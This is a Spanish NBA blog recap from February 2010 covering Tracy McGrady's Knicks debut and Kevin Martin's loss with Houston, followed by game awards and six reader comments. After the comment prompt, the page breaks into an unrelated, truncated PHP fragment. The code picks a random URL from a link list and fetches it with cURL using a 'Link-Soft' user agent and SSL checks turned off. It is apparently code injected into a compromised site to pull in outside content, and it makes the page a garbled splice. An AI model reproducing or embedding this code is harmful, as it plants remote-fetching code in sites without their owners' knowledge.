La Crónica (20/02/2010)

21 de February de 2010 por TheDeerHunter

La noticia fue el debut por todo lo alto de T-Mac en el Madison, con el nº 3  en la zamarra, que vistió otro Knick de infausto recuerdo. Un partido vibrante que terminaron resolviendo Durant y Westbrook a favor de los Thunder en la prórroga.

Los que le vieron aseguran que posiblemente ya no pueda darse auto-alley ups contra tabla como antaño y que su físico no le permitirá aguantar minutadas como la de anoche, pero estuvo ilusionante. Quien tuvo retuvo y el viejo Tracy tuvo mucho. No creo que se haya merecido todo esto.

Por contra el debut de Kevin Martin en Houston fue terrorífico en una dolorosa derrota contra los Pacers de un excepcional Granger. Serán los nervios que hemos visto en varios debutantes recientemente, pero temo que será complicado que sea capaz superar el rendimiento que hubieran podido combinar Landry y T-Mac en otras circunstancias. Queda la sensación de oportunidad perdida para Adelman, ilustrada en sus posibilidades de catar postemporada. Cada vez menores.

En cambio, los Mavs se mostraron sólidos contra unos Heat sin Wade que se pusieron bastante respondones. Los Raptors, nuevamente sin Bosh, resolvieron correctamente contra unos Wizards renacidos. Todavía mejor estuvieron los Bucks contra los Bobcats, encontrando en Salmons el artillero que les faltaba.

Finalmente los Bulls no tuvieron problemas en imponerse a los Sixers y los Clippers hicieron lo propio contra los Kings.

PREMIOS

MVP: Nos hace falta quitarnos el saborcillo de chupón de Westbrook que quedó tras su actuación en el partido de Shophomores. Con casi-triple dobles como el de anoche conseguirá que le perdonemos.

El rookie: Taj Gibson agradece la confianza que le han dado los Bulls con actuaciones de auténtico líder. Anoche un 20-13, siendo el mejor de su equipo en la fácil victoria contra los Sixers. Cualquier ala-pívot se hace un dios al lado de Brand.

La sorpresa: Hacía tiempo que TJ Ford no mostraba su mejor cara. Anoche fue pieza clave para que su equipo se llevara la victoria del siempre complicado Toyota Center de Houston.

La decepción: El 3 de 16 de Kevin Martin. No sabemos qué es lo que le ha pasado a este chico tras salir de la lesión. Los Rockets van a necesitar la mejor de sus versiones en lo que queda de liga.

El mayor esfuerzo en vano: Como casi todos los días David Lee… aunque hoy puede hacerle compañía T-Mac.

Comenta

6 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Lo que le queda a McGrady es el talento puro, y en eso hay pocos que le ganen en la liga. Esta para jugar 15-20 minutitos de mucha calidad, en un equipo ganador sería un lujo siempre que no quiera cobrar demasiado.

      Citar

  2. aro_pasado_no_newtoniano dice:
    #2

    Y todas áquellas personas que se compraron la camiseta de NY de Marbury,, estarán tirándose de los pelos (a no ser que lleven el peinado de Marbury)??

      Citar

  3. Toni dice:
    #3

    No hubiera disfrutado esta noche uno que yo me se viendo a McGrady…
    En fin, como bien decís este nivel no lo mantendrá pero de vez en cuando sacará a pasear ese talento y esa sonrisa chistosa por el MSG.
    Ojo con los Bucks que tienen a tiro a los de Larry Brown y con Salmons tienen un equipo parece ser que han encontrado la pieza que buscaban.

      Citar

  4. Dantley2 dice:
    #4

    McGrady ha dicho que el dinero no es problema. Se rumorea que si viene LeBron y alguna otra superestrella, no tendría inconveniente en quedarse por el mínimo.

    Muchos minutos de Sergio y minutos importantes.

    Enorme Taj Gibson, siempre cumpliendo y siempre muy regular

      Citar

  5. Love Denise dice:
    #5

    Como comenté esta mañana en el articulo “fin de fiesta. McGrady a knicks….” parece ser que no le importaría volver a los Magic con su primo

      Citar

  6. Txusma dice:
    #6

    Le queda fantastica la camiseta de NY a T-Mac, todo hay que decirlo… Y gran debut de Eddie House, tb.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>